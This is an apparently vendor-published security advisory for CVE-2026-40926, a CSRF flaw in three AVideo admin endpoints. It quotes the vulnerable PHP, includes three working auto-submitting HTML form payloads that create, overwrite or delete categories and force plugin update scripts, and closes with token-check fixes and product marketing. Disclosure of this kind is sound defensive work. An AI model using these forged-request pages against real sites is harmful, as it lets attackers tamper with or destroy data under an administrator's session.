CVE-2026-40926

CVE-2026-40926 is a high-severity cross-site request forgery (CSRF) vulnerability in wwbn/avideo (composer), affecting versions <= 29.0. No fixed version is listed yet.

Summary

Three admin-only JSON endpoints, objects/categoryAddNew.json.php, objects/categoryDelete.json.php, and objects/pluginRunUpdateScript.json.php, enforce only a role check (Category::canCreateCategory() / User::isAdmin()) and perform state-changing actions against the database without calling isGlobalTokenValid() or forbidIfIsUntrustedRequest(). Peer endpoints in the same directory (pluginSwitch.json.php, pluginRunDatabaseScript.json.php) do enforce the CSRF token, so the missing checks are an omission rather than a design choice. An attacker who lures a logged-in admin to a malicious page can create, update, or delete categories and force execution of any installed plugin's updateScript() method in the admin's session.

Details

AVideo's CSRF defense is not applied globally, each endpoint must explicitly call isGlobalTokenValid() (defined in objects/functions.php:2313), which verifies $_REQUEST['globalToken']. A search across the codebase shows 18 files that correctly invoke forbidIfIsUntrustedRequest() or isGlobalTokenValid(), while the three endpoints below do not.

1. objects/categoryAddNew.json.php:18, CSRF create/overwrite category

 18 if (!Category::canCreateCategory()) {
 19     $obj->msg = __("Permission denied");
 20     die(json_encode($obj));
 21 }
 22
 23 $objCat = new Category(intval(@$_POST['id']));
 24 $objCat->setName($_POST['name']);
 25 $objCat->setClean_name($_POST['clean_name']);
 26 $objCat->setDescription($_POST['description']);
 27 $objCat->setIconClass($_POST['iconClass']);
 28 $objCat->setSuggested($_POST['suggested']);
 29 $objCat->setParentId($_POST['parentId']);
 30 $objCat->setPrivate($_POST['private']);
 31 $objCat->setAllow_download($_POST['allow_download']);
 32 $objCat->setOrder($_POST['order']);
 33 $obj->categories_id = $objCat->save();

Category::canCreateCategory() (objects/category.php:620-630) returns true for any admin. Because the row is loaded via new Category(intval(@$_POST['id'])), a non-zero id causes the existing row to be overwritten, not just created, the same primitive can mutate existing categories. No CSRF/Origin check precedes the write.

2. objects/categoryDelete.json.php:10, CSRF delete category

 10 if (!Category::canCreateCategory()) {
 11     die('{"error":"' . __("Permission denied") . '"}');
 12 }
 13 require_once 'category.php';
 14 $obj = new Category($_POST['id']);
 15 $response = $obj->delete();

No token check. An attacker can force an admin browser to POST any id, deleting rows from categories.

3. objects/pluginRunUpdateScript.json.php:9, CSRF forced plugin update

  9 if (!User::isAdmin()) {
 10     forbiddenPage('Permission denied');
 11 }
 12 if (empty($_POST['name'])) {
 13     forbiddenPage('Name can\'t be blank');
 14 }
 15 ini_set('max_execution_time', 300);
 16 require_once $global['systemRootPath'] . 'plugin/AVideoPlugin.php';
 17
 18 if($_POST['uuid'] == 'plist12345-370-4b1f-977a-fd0e5cabtube'){
 19     $_POST['name'] = 'PlayLists';
 20 }
 21
 22 $obj = new stdClass();
 23 $obj->error = !AVideoPlugin::updatePlugin($_POST['name']);

AVideoPlugin::updatePlugin() (plugin/AVideoPlugin.php:1452) looks up the plugin by name and, if it defines an updateScript() method, invokes it and then records the new plugin version via Plugin::setCurrentVersionByUuid. No CSRF or Origin check precedes this. By contrast, the sibling endpoint objects/pluginRunDatabaseScript.json.php:16 does call isGlobalTokenValid(), and objects/pluginSwitch.json.php:12 also calls it, confirming this file is an omission.

Why no global mitigation blocks this

  • isGlobalTokenValid() is not invoked from objects/configuration.php or any other bootstrap; it must be called per-endpoint.
  • isUntrustedRequest() (objects/functionsSecurity.php:146) is only triggered via an explicit call to forbidIfIsUntrustedRequest(); none of the three endpoints call it.
  • The handlers use $_POST directly without any framework-level CSRF middleware (AVideo does not use one).
  • Category::canCreateCategory() is purely a role check and does not examine request origin or tokens.

PoC

All three require the victim to be a logged-in AVideo administrator who visits the attacker-hosted page. Cookies are sent automatically by the browser.

PoC 1, Create/overwrite category

<!-- evil-create.html -->
<html><body>
<form id=f action="https://victim.example.com/objects/categoryAddNew.json.php" method="POST">
  <input name="id" value="0">            <!-- 0 = create; any existing id = overwrite -->
  <input name="name" value="Owned">
  <input name="clean_name" value="owned">
  <input name="description" value="pwn">
  <input name="iconClass" value="fas fa-skull">
  <input name="suggested" value="1">
  <input name="parentId" value="0">
  <input name="private" value="0">
  <input name="allow_download" value="1">
  <input name="order" value="1">
</form>
<script>document.getElementById('f').submit();</script>
</body></html>

Expected: a new row appears in the categories table, returned as {"error":false,"categories_id":<n>,...}. Changing id=0 to an existing category id overwrites that row's fields.

PoC 2, Delete category

<!-- evil-delete.html -->
<html><body>
<form id=f action="https://victim.example.com/objects/categoryDelete.json.php" method="POST">
  <input name="id" value="2">
</form>
<script>document.getElementById('f').submit();</script>
</body></html>

Multiple hidden iframes with different id values can walk the category id space and wipe the category tree.

PoC 3, Force plugin updateScript()

<!-- evil-plugin-update.html -->
<html><body>
<form id=f action="https://victim.example.com/objects/pluginRunUpdateScript.json.php" method="POST">
  <input name="name" value="Live">
  <input name="uuid" value="anything">
</form>
<script>document.getElementById('f').submit();</script>
</body></html>

Expected: server logs AVideoPlugin::updatePlugin name=(Live) uuid=(...) and the plugin's updateScript() runs in the admin's session, with execution time extended to 300s.

Impact

  • Integrity: An attacker can silently cause the admin's browser to create, mutate, or delete rows in the categories table. Overwrite is especially damaging because field-level state (parent, privacy, allow_download, clean_name, iconClass) is changed without any UI feedback to the admin. Combined with any view that renders description without escaping, this becomes a vector for stored XSS propagation.
  • Availability (partial): categoryDelete.json.php is a pure destructive primitive that allows category rows to be removed one by one by iterating ids; there is no recovery flow.
  • Privileged code execution trigger: pluginRunUpdateScript.json.php lets the attacker force execution of any installed plugin's updateScript() method (with a 5-minute execution window) in the admin's context. When chained with other primitives that influence plugin state or the plugin's own update logic, this is a foothold for deeper compromise.
  • Blast radius: Each vulnerable endpoint requires only a single admin visit to any attacker-controlled page (XSS on a third-party site, a phishing link, a forum post with an auto-submitting form). No interaction beyond loading the page is required.

A victim's authenticated browser session is used to submit forged requests to an application that cannot distinguish them from legitimate ones. Typical impact: state-changing actions performed as the victim without their consent.

CVE-2026-40926 has a CVSS score of 7.1 (High). The vector is network-reachable, no privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.

Affected versions

wwbn/avideo (<= 29.0)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Add an explicit CSRF token check (and ideally an Origin check) to each endpoint, matching the pattern already used by pluginSwitch.json.php and pluginRunDatabaseScript.json.php.

// objects/categoryAddNew.json.php (after line 18)
if (!Category::canCreateCategory()) {
    $obj->msg = __("Permission denied");
    die(json_encode($obj));
}
if (!isGlobalTokenValid()) {
    http_response_code(403);
    die('{"error":"' . __('Invalid token') . '"}');
}
forbidIfIsUntrustedRequest();
// objects/categoryDelete.json.php (after line 12)
if (!Category::canCreateCategory()) {
    die('{"error":"' . __("Permission denied") . '"}');
}
if (!isGlobalTokenValid()) {
    http_response_code(403);
    die('{"error":"' . __('Invalid token') . '"}');
}
forbidIfIsUntrustedRequest();
// objects/pluginRunUpdateScript.json.php (after line 11)
if (!User::isAdmin()) {
    forbiddenPage('Permission denied');
}
if (!isGlobalTokenValid()) {
    http_response_code(403);
    die('{"error":"' . __('Invalid token') . '"}');
}
forbidIfIsUntrustedRequest();

The long-term fix is to apply forbidIfIsUntrustedRequest() to every state-changing JSON endpoint via a shared include (e.g., a mandatory bootstrap file loaded by all *.json.php endpoints), so that future handlers cannot forget the check.

Frequently Asked Questions

  1. What is CVE-2026-40926? CVE-2026-40926 is a high-severity cross-site request forgery (CSRF) vulnerability in wwbn/avideo (composer), affecting versions <= 29.0. No fixed version is listed yet. A victim's authenticated browser session is used to submit forged requests to an application that cannot distinguish them from legitimate ones.
  2. How severe is CVE-2026-40926? CVE-2026-40926 has a CVSS score of 7.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of wwbn/avideo are affected by CVE-2026-40926? wwbn/avideo (composer) versions <= 29.0 is affected.
  4. Is there a fix for CVE-2026-40926? No fixed version is listed for CVE-2026-40926 yet. Monitor the advisory for updates and apply mitigations in the interim.
  5. Is CVE-2026-40926 exploitable, and should I be worried? Whether CVE-2026-40926 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-40926 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-40926? No fixed version is listed yet. In the interim: Use per-session CSRF tokens on all state-changing operations and verify them server-side. SameSite cookie attributes provide additional defense.

Other vulnerabilities in wwbn/avideo

CVE-2026-33731CVE-2026-33692CVE-2026-33684CVE-2026-54458CVE-2026-50183

Stop the waste.
Protect your environment with Kodem.